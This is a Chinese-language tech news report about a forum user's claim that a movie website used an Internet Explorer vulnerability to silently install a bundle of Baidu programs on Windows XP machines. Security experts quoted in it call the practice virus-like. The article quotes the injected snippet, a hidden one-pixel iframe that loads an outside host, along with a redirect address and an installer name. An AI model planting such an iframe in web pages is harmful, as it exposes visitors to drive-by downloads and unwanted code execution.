百度利用IE漏洞推广软件 专家称其病毒行为

“百度杀毒像病毒一样攻击用户系统漏洞，真是连底裤都不要了！”近日，名为“雷帝因陀罗”网友在安全论坛卡饭上爆料，称自己用XP电脑访问百度影音联盟网站时，电脑自动下载运行了百度杀毒、百度卫士、百度浏览器和百度输入法等一系列百度软件。经过分析，发现这是名为“百度有钱联盟”的安装包在利用IE漏洞植入电脑。

据该网友介绍，他在上网看片搜到一个影音站，结果片子半天没有缓冲出来，电脑先卡得要死。没过一会儿，突然发现桌面右下角冒出几个图标，不知怎么就装上了百度杀毒、百度卫士之类的。

该网友检测了下页面的源代码“www.80ydw.com/movie/693.html”，发现居然被挂马了：<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>。经过进一步分析，该页面会跳转到“221.233.160.110/images/xml.html”，原来黑客是利用微软11月刚补的IE漏洞挂马（XP系统直接中招），而且挂的是一个百度官方签名的安装包，下载地址也是在百度服务器！

再观察百度利用IE漏洞偷偷安装的安装包，文件名是BaiduYouQianPartPackSilent_1.1.0.10_150946.exe，大小有144MB！当它利用漏洞自动下载执行后，会给电脑里装上百度杀毒、百度卫士、百度浏览器和百度输入法等一系列软件。

在看到“雷帝因陀罗”在卡饭论坛上的帖子之后，有网友在一台XP电脑上进行了验证，浏览器打开“www.80ydw.com/movie/693.html”这个网页，什么也不干，大约6分钟后，桌面上出现了百度杀毒、百度卫士、百度浏览器、百度输入法四个图标，这4款软件被安装在电脑中。

业内人士指出，漏洞是木马病毒入侵的一个主要通道，黑客利用漏洞在网站挂马，一旦有人访问电脑就会自动下载运行病毒。而百度利用这种方式推广软件牟利，简直是赤裸裸的病毒行为。难怪网友“雷帝因陀罗”怒斥，百度杀毒攻击用户的系统漏洞，真是连底裤都不要了。

有安全专家称，利用漏洞进行攻击入侵，是典型的病毒行为，是安全防护技术予以拦截和阻止的，一个有足够影响的互联网知名公司，用这种病毒行为进行产品推广，有违行业道德。

责任编辑：wb001

文章来源：http://tech.72177.com/2014/1203/1898250.shtml